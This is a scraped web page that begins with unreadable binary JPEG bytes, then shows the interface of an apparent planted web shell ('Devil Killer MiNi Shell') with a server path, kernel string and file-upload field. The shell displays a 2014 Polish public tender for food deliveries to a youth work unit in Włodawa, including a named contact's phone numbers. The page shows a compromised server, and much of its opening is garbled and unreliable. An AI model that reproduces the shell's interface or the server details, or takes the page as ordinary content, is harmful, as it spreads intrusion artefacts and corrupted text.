JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140401/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140401/110160-N-2014.html

<p class="kh_header"><b>Lublin: Dostawa artykułów żywnościowych do ŚRODOWISKOWEGO HUFCA PRACY WE WŁODAWIE.</b><br>
<b>Numer ogłoszenia: 110160 - 2014; data zamieszczenia: 01.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ochotnicze Hufce Pracy Lubelska Wojewódzka Komenda , ul. Wojciechowska 7, 20-704 Lublin, woj. lubelskie, tel. 081 5245108/09 w.13, faks 081 5245108/09.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lubelska.ohp.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: OCHOTNICZE HUFCE PRACY.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów żywnościowych do ŚRODOWISKOWEGO HUFCA PRACY WE WŁODAWIE..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa artykułów żywnościowych do Środowiskowego Hufca Pracy we Włodawie, mieszczącego się przy ul. Kopernika 1, 22 200 Włodawa.
Oferowane artykuły żywnościowe muszą być dopuszczone do obrotu oraz posiadać dobrą jakość. Produkty te powinny odpowiadać, co do jakości, wymogom wyrobów dopuszczonych do obrotu i stosowania w zbiorowym żywieniu. 
Szczegółowy opis przedmiotu zamówienia określa załącznik nr 1 do SIWZ.
Dostawy będą wykonywane do wyczerpania środków Zamawiającego na ten przedmiot zamówienia.
Zgodnie z art. 29 ust. 3 ustawy Prawo zamówień publicznych Zamawiający w niniejszym postępowaniu dopuszcza składanie ofert równoważnych a wszelkie składniki przedmiotu zamówienia określone za pomocą  nazw producenta, określają minimalne parametry jakościowe i cechy użytkowe, jakim muszą odpowiadać dostarczane artykuły, aby spełniać opisane poniżej wymagania zamówienia.
3.1.2. MIEJSCE DOSTAWY Środowiskowy Hufiec Pracy we Włodawie, ul. Kopernika 1, 22-200 Włodawa.
3.1.3. SPOSÓB DOSTAWY dostawy będą następować cyklicznie stosownie do potrzeb Zamawiającego od dnia podpisania umowy do 31 grudnia 2014 roku, po uprzednim telefonicznym ustaleniu, z wyprzedzeniem jednodniowym przez Zamawiającego wielkości 
i terminu dostawy. Wykonawca realizuje zamówienie zgodnie z wymogami Zamawiającego, dzień dostawy zawsze wyznaczany jest przez osobę odpowiedzialną za zamówienia artykułów żywnościowych w jednostce organizacyjne LWK OHP. Wykonawca bezwzględnie musi stosować się do potrzeb i wymogów Zamawiającego.
Osoba odpowiedzialna za dostawy Mariola Wojtak, tel. 607 849 275, 082 572 56 62.
3.1.4. Zamawiający dopuszcza składanie ofert częściowych. Wykonawca może złożyć ofertę na jedną lub więcej części
Część 1	ryby przetworzone i konserwowane,
Część 2	owoce, warzywa i podobne produkty,
Część 3	oleje i tłuszcze zwierzęce lub roślinne,
Część 4	produkty mleczarskie,
Część 5	produkty przemiału ziarna, skrobi i produktów skrobiowych,
Część 6	różne produkty spożywcze - pozostałe,
Część 7	napoje bezalkoholowe,
Część 8	produkty zwierzęce, mięso i produkty mięsne,
Część 9	pieczywo, świeże wyroby piekarskie i ciastkarskie,
Część 10	świeży drób,
Część 11	produkty mrożone..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0, 15.30.00.00-1, 15.40.00.00-2, 15.50.00.00-3, 15.60.00.00-4, 15.80.00.00-6, 15.98.00.00-1, 15.10.00.00-9, 15.81.00.00-9, 15.11.21.00-7, 15.33.11.70-9, 15.22.10.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 11.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dla części: 1, 4, 8 i 10:
5.1.1. posiadanie wiedzy i doświadczenia
wykonanie w okresie ostatnich 3 lat przed wszczęciem postępowania (a jeśli okres prowadzenia działalności jest krótszy  w tym okresie) minimum 2 dostaw artykułów żywnościowych o wartości równej lub większej niż 30 000,00 zł brutto każda,
dla części: 2, 3, 5, 6, 7 i 9
5.1.1. posiadanie wiedzy i doświadczenia
wykonanie w okresie ostatnich 3 lat przed wszczęciem postępowania a jeśli okres prowadzenia działalności jest krótszy w tym okresie minimum 2 dostaw artykułów żywnościowych o wartości równej lub większej niż 30 000,00 zł brutto każda,
dla części 11
5.1.1. posiadanie wiedzy i doświadczenia
wykonanie w okresie ostatnich 3 lat przed wszczęciem postępowania a jeśli okres prowadzenia działalności jest krótszy  w tym okresie minimum 2 dostaw artykułów żywnościowych o wartości równej lub większej niż 30 000,00 zł brutto każda,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dla części 1, 4, 8 i 10 
5.1.2 dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia
dysponowanie sprawnym pod względem technicznym samochodem, z działającą prawidłowo zabudową izotermiczną lub chłodnią, 

dla części 11
5.1.2 dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia
dysponowanie sprawnym pod względem technicznym samochodem, z działającą prawidłowo mroźnią.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, z zastrzeżeniem ust. 2
2.     Strony przewidują możliwość wprowadzenia następujących zmian w umowie: 
1 zmiana stawki i kwoty podatku Vat.
2 zmiana terminu realizacji przedmiotu zamówienia, w przypadku:
a działania siły wyższej, uniemożliwiającej wykonanie umowy w określonym pierwotnie terminie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.lubelska.ohp.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ul. Wojciechowska 7, 20-704 Lublin, pok. 216.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.04.2014 godzina 10:00, miejsce: ul. Wojciechowska 7, 20-704 Lublin, pok. 216.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ryby przetworzone i konserwowane,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kostka mrożona filet z morszczuka  bez lodu 
Płaty śledziowe SEKO                             lub równoważny
 Śledź w pomidorach 170g GRAL                     lub równoważny
Śledź  w oleju  170g Super Fisz                    lub równoznaczne 
Sałatka pikantna z makreli                    Super Fisz  lub równoważny 
Filet mrożony tilapia bez lodu   
Filet mrożony panga bez lodu 
Kotlet rybny -burgery                       lub równoważny 
Filety śledziowe w oleju  SEKO             lub równoważny
Leczo rybne SEKO  marchew, cebula ,pietruszka, seler, ryba,                            lub równoważny
Śledzie w śmietanie SEKO                     lub równoważny
Paprykarz szczeciński NEPTUN  lub równoważny 
Tuńczyk w oleju roślinnym              Super Fisz  lub równoważny 
Tuńczyk w sosie własnym                Super Fisz  lub równoważny.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> owoce, warzywa i podobne produkty,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ogórek kiszony twardy
Ogórek małosolny
Ogórek szklarniowy 
Sałata masłowa                                        
Kapusta kiszona 
Jajka klasa A wielkość L jakość od  0 do 3
Burak czerwony ćwikłowy 
Cebula czerwona 
Cebula biała  zwyczajna
Fasola biała strączkowa
Fasola Jaś
Fasola szparagowa żółta 
Fasola szparagowa zielona  
Brokuł zielony 
Groch  łuskany połówki             
Czosnek  główka  pospolity
Kalafior  biały 
Kapusta biała jesienna, zimowa
Kapusta biała młoda
Kapusta czerwona 
Kapusta pekińska
Koperek zielony pęczek
Natka pietruszki pęczek
Szczypior pęczek
Marchew korzeń 
Papryka czerwona
Papryka żółta 
Pieczarki
Pietruszka korzeń 
Pomidor klasa I
Pomidor klasa II
Por  korzeń
Rzodkiewka pęczek 
Sałata lodowa
Seler korzeń 
Soczewica  strączkowa 
Ziemniaki  jesienne i zimowe irga 
Ziemniak młody irysy                    
Brzoskwinia
Pomarańcze
Truskawka 
Grapefruit czerwony 
Kiwi
Jabłka Champion
Jabłka Jonagold 
Jabłka Gloster 
Jabłko Lobo 
Mandarynka bezpestkowa 
Śliwka węgierka 
Winogron biały
Winogron ciemny
Banany 
Cytryna.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> oleje i tłuszcze zwierzęce lub roślinne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Olej roślinny mazowiecki  lub równoważny.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.40.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> produkty mleczarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jogurt  truskawka,  jagoda , poziomka  150g Spomlek                          lub  równoważny 
Jogurt naturalny 400 g Spomlek                         lub równoważny
Kefir 400 g Spomlek  lub  równoważny 
Masło 74% tłuszczu                         
Mleko 2 % Łowicz                                      lub równoważny
Śmietana 18 % Łowicz                                lub równoważny
Śmietana 12 %  Mlekowita            lub równoważny
Ser żółty typu salami, Spomlek     lub równoważny
Twaróg półtłusty  Spomlek                      lub równoważny
Twaróg chudy Spomlek                   lub równoznaczny  
Twaróg tłusty Spomlek                        lub równoznaczny 
Ser topiony krążek 140g Tychy                 lub równoważny 
Masło extra  82% tłuszczu              
Ser topiony  Tychy                                     lub równoważny 
Serek homogenizowany waniliowy  Łowicz lub równoważny  
Masło roślinne Mlekowita            lub równoważny
Serek wiejski śmietankowy 135g  Piątnica  lub równoważny
Serek  wiejski ze szczypiorkiem 135g Piętnica lub równoważny 
Ser topiony Plastry 130g Hochland lub równoważny.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> produkty przemiału ziarna, skrobi i produktów skrobiowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kasza manna Kraw Pak               lub równoważny 
Kasza gryczana  Kraw Pak                       lub równoważny  
Mąka krupczatka typ 500 Lubella lub równoznaczny 
Mąka pszenna typ  450 tortowa Młyny w Stoisławiu                                   lub równoważny  
Mąka pszenna typ 500 Lubella lub równoważny 
Mąka ziemniaczana Polgreen            lub równoważny 
Ryż Janex biały długoziarnisty      lub równoważny
Ryż saszetki  długo ziarnisty              Kraw Pak  lub równoważny
Kasza jęczmienna  Kraw  Pak                     lub równoważny.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.60.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> różne produkty spożywcze  pozostałe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Bułka tarta  Prymat                      lub równoważny 
Baton czekoladowy Pawełek   Wedel  lub równoważny
Budyń w proszku śmietankowy Winiary  lub równoważny 
Cukier  Kryształ Polski                   lub równoważny
Cukier wanilinowy Winiary                      lub równoważny 
Czekolada  Wedel  mleczna                    lub równoważny
Czekolada nadziewana truskawkowa Wedel                          lub równoważny
Czekolada gorzka Wedel lub równoważny  
Deserki, typu. MONTE 55 g
Galaretka w proszku truskawkowa  Dr.Oetker  lub równoważny
Galaretka w proszku                          cytrynowa Dr.Oetker                               lub równoważny 
Cynamon mielony Prymat           lub równoważny 
Herbata   czarna  Golden Assam lub równoważny   
Herbata EKOLAND rozpuszczalna lub równoważna  
Herbata ekspresowa 100lipton lub równoważny
Kakao Decomoreno                                    lub równoważny 
Kakao Puchatek lub równoważny
Kawa zbożowa                     
Ketchup  Pudliszki                                 lub  równoważny 
Liść laurowy suchy Prymat                         lub równoważny 
Proszek do pieczenia Winiary                lub równoważny 
Kisiel  wiśniowy  Winiary                        lub równoznaczny 
Kisiel truskawkowy Winiary                  lub równoważny 
Kisiel cytrynowy Winiary                     lub równoważny 
Rodzynki  Bakaland                      lub równoważny 
Soda oczyszczona Delectta                    lub równoważny
Konserwa Luncheon meat 300 g lub równoważny
Majonez dekoracyjny  Winiary                          lub równoważny 
Makaron świderki  Lubella                  lub równoważny 
Makaron  krajanka Lubella                   lub równoważny 
Makaron kokardki Lubella                    lub równoważny
Makaron muszelki Lubella lub równoważny 
Marmolada wieloowocowa Łowicz lub równoważny 
Miód pszczeli  wielokwiatowy 
Miód sztuczny 
Musztarda sarepska Develey                            lub równoważny 
Musztarda delikatesowa  Develey lub równoważny 
Majeranek  suszony Prymat                lub równoważny 
Syrop malinowy Herbapol                    lub równoważny
Syrop truskawkowy Herbapol              lub równoważny
Syrop pomarańczowy Herbapol lub równoważny
Syrop aroniowy Herbapol                     lub równoważny 
Syrop porzeczkowy Herbapol             lub równoważny 
Syrop cytrynowy Herbapol                  lub równoważny 
Ocet  spirytusowy 10%
Pasztet podlaski 195 g Droset              lub równoważny 
Pasztet mazowiecki 460 g Łuków lub równoważny 
Pieprz czarny  mielony  Prymat lub równoważny
Przyprawa do zup w płynie Winiary lub równoważny 
Przyprawa typu kucharek                                    lub równoważny 
Przyprawa do bigosu Prymat               lub równoważny 
Przyprawa  do mięsa Prymat              lub równoważny 
Przyprawa do ryb Prymat                     lub równoważny 
Przyprawa czosnek granulowany Prymat lub równoważny 
Przyprawa do grosa Prymat                lub równoważny 
Przyprawa  do ziemniaków Prymat lub równoważny 
Przyprawa do żeberek Prymat lub równoważny 
Kwasek cytrynowy Prymat                lub równoważny 
Sos do spaghetti słoik Pudliszki   lub równoważny 
Sos Boloński  słoik  Pudliszki                          lub równoważny 
Rosół drobiowy  Knorr                            lub równoważny 
Rosół wołowy Knorr                               lub równoważny 
Sos chrzanowy Develey                       lub równoważny 
Sos czosnkowy Develey                        lub równoważny 
Sosy w proszku grzybowy Kucharek  lub równoważny 
Sos w proszku pieczeniowy  ciemny  Kucharek                                       lub równoważny 
Sos pieczarkowy w proszku Kucharek lub równoważny 
Barszcz czerwony w proszku Kucharek lub równoważny
Barszcz biały w proszku Winiary lub równoważny 
Żurek w proszku Winiary lub równoważny 
Zupa krem z pieczarek  Knorr                 lub równoważny
Sól jodowana jadalna 
Zioła prowansalskie suszone Prymat  lub równoważny 
 Oregano  suszone Prymat                     lub równoważny 
Bazylia suszona Prymat                    lub równoważny 
Ziele angielskie  całe Prymat             lub równoważny  
Cukier puder  Kraw Pak                      lub równoważny 
Drożdże piekarskie kostka                lub równoważne
Ananas w puszce Sandra                          lub równoważny 
Chrzan w słoiku Smak                      lub równoważny 
Dżem  czarna porzeczka   Łowicz lub równoważny 
Dżem truskawka Łowicz                          lub równoważny 
Dżem wiśnia  Łowicz                    lub równoważny 
Dżem brzoskwinia Łowicz                      lub równoważny
Grzyby suszone całe podgrzybki  Prymat lub równoważne
Grzyby suszone całe prawdziwki Prymat lub równoważny 
Koper suszony  Prymat                   lub równoważne 
Kukurydza konserwowa Pudliszki  lub równoważny
Koncentrat pomidorowy  słoik Pudliszki lub równoważny
Ogórek konserwowy słoik Agrovita lub równoważny
Papryka konserwowa słoik Pudliszki lub równoważny 
Pieczarka marynowana słoik Smak             lub równoważny 
Szczaw konserwowy słoik Pudliszki lub równoważny 
Groszek konserwowy  puszka Pudliszki  lub równoznaczny 
Mieszanka owoców suszonych(gruszka, jabłko, śliwka)HELIO lub równoważny
Pieprz ziołowy mielony Prymat                        lub równoważny 
Sos sałatkowy w proszku Prymat                         lub równoważny 
 Natka pietruszki suszona Prymat  
Lub równoważny.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> napoje bezalkoholowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Napój owocowy niegazowany 1,5l Helena lub równoważny 
Napój gazowany 1,5l Zbyszko lub równoważny.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.98.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> produkty zwierzęce, mięso i produkty mięsne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Bok surowy bez żeberek 
Bok surowy wieprzowy
Karkówka bez kości
Kości karkowe
Kości schabowe 
Nogi wieprzowe
Płuca wieprzowe
Schab bez kości
Słonina
Szynka wieprzowa bez kości
Udziec wołowy bez kości
Wątroba wieprzowa
Wieprzowina kl. I chude 100% 
Wieprzowina   kl. II co najmniej 65% mięsa wieprzowego                    35% tłuszczu 
Wołowina kl.II65%mięsa wołowego 35% Łuszczu 
Łopatka wieprzowa bez kości 
Smalec
Żeberka paski
Baleron wędzony gotowany                     co najmniej 80%mięsa wieprzowego
Bok grilowy co najmniej 70%mięsa wieprzowego
Bok pieczony co najmniej 60%mięsa wieprzowego
